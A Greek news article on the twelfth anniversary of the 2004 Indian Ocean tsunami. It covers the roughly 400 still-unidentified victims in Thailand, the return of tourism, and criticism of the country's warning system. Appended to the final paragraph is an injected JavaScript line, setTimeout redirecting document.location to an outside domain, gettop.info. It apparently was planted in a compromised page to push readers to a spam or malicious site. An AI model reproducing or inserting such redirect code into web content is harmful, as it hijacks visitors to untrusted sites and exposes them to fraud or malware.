12 χρόνια μετά το φονικό τσουνάμι στην Ταϊλάνδη 400 σοροί δεν έχουν αναγνωριστεί

0
75

 

Ήταν πριν από 12 χρόνια που το φονικό τσουνάμι χτύπησε τις χώρες του Ινδικού Ωκεανού, Ταϊλάνδη, Ινδονησία, Ινδία και Σρι Λάνκα, έπειτα από σεισμό 9,1 Ρίχτερ, σε μία από τις μεγαλύτερες φυσικές καταστροφές στην ιστορία.

Περίπου 226.000 άνθρωποι σκοτώθηκαν ενώ τουλάχιστον 400 θύματα δεν έχουν ακόμη αναγνωριστεί 12 χρόνια μετά.

Στην Ταϊλάνδη, 5.395 άνθρωποι σκοτώθηκαν από τους οποίους σχεδόν 2.000 ήταν ξένοι τουρίστες.

Ο υποδιευθυντής της αστυνομίας στην περιοχή Τάκουα Πα της επαρχίας Φανγκ Νγκα, Ανάντ Μπονκερκού δήλωσε πως «μετά το τσουνάμι του 2004, οι αρχές επικοινώνησαν με 4.000 έως 5.000 συγγενείς καλώντας τους να πάνε στα νεκροτομεία να παραλάβουν τις σορούς. Υπάρχουν περίπου 400 σοροί οι οποίες ακόμη δεν έχουν αναγνωριστεί«.

Η ζωή στην πληγείσα περιοχή έχει επανέλθει ενώ νέα ξενοδοχεία έχουν αντικαταστήσει αυτά που ισοπεδώθηκαν από τα παλιρροϊκά κύματα και η τουριστική κίνηση κινείται σε πυρετώδιες ρυθμούς.

Η χώρα αναμένει να έχει ρεκόρ επισκεψιμότητας εφέτος, με 32,4 εκατομμύρια ξένους τουρίστες.

Ωστόσο, υπάρχουν επισημάνσεις ότι το σύστημα προειδοποίησης για τσουνάμι της Ταϊλάνδης παραμένει ανεπαρκές, εξαιτίας της έλλειψης κατάλληλης συντήρησής του. Η κυβέρνηση υποστηρίζει ότι το σύστημα λειτουργεί όπως πρέπει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here